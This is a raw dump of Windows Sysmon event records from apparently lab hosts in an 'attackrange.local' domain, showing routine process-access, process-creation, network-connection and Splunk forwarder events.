154100x80000000000000001053688Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.091{5EBD8912-8CD3-6151-4C00-00000000FD01}3152C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'" "| Select-Object" "ProductName, BuildLabEx, CurrentMajorVersionNumber, CurrentMinorVersionNumber" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{5EBD8912-8CD2-6151-4300-00000000FD01}3760C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 10341000x80000000000000001053687Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.031{5EBD8912-8CC0-6151-1600-00000000FD01}12963108C:\Windows\system32\svchost.exe{5EBD8912-8CD3-6151-4B00-00000000FD01}4056C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+2dbe|C:\Windows\system32\wbem\wmiprvsd.dll+155e9|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wmiprvsd.dll+fa1f|C:\Windows\system32\wbem\wmiprvsd.dll+1351d|C:\Windows\system32\wbem\wmiprvsd.dll+127f4|C:\Windows\system32\wbem\wbemcore.dll+1016a|C:\Windows\system32\wbem\wbemcore.dll+2d15f|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053686Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.025{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD3-6151-4B00-00000000FD01}4056C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053685Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.019{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CD2-6151-4900-00000000FD01}3976C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053684Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.019{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CD2-6151-4900-00000000FD01}3976C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053683Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.012{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8CD3-6151-4B00-00000000FD01}4056C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053682Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.012{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD3-6151-4B00-00000000FD01}4056C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+366e9|c:\windows\system32\rpcss.dll+3bed2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000980530Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:17.114{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54489-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000980529Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:16.730{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-55886-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000980528Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:15.804{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59497-false10.0.1.12-8000- 23542300x8000000000000000980527Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:19.215{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AF4152555A5B864956BF5A8EE80C00C,SHA256=D27B88321228CD4621F6F4EFEC9DD27A08B390B38CD279243404A0910805E9B1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053942Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.963{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD4-6151-5900-00000000FD01}3316C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053941Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.961{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053940Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.961{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053939Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.961{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053938Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.961{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053937Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.961{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053936Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.961{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053935Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.961{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053934Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.961{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8CD4-6151-5900-00000000FD01}3316C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053933Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.960{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053932Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.960{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053931Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.960{5EBD8912-8CD4-6151-5800-00000000FD01}33282592C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{5EBD8912-8CD4-6151-5900-00000000FD01}3316C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053930Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.960{5EBD8912-8CD4-6151-5900-00000000FD01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{5EBD8912-8CD4-6151-5800-00000000FD01}3328C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list replication_port --no-log 10341000x80000000000000001053929Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.956{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053928Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.956{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053927Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.956{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD4-6151-5800-00000000FD01}3328C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053926Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.956{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053925Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.956{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053924Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 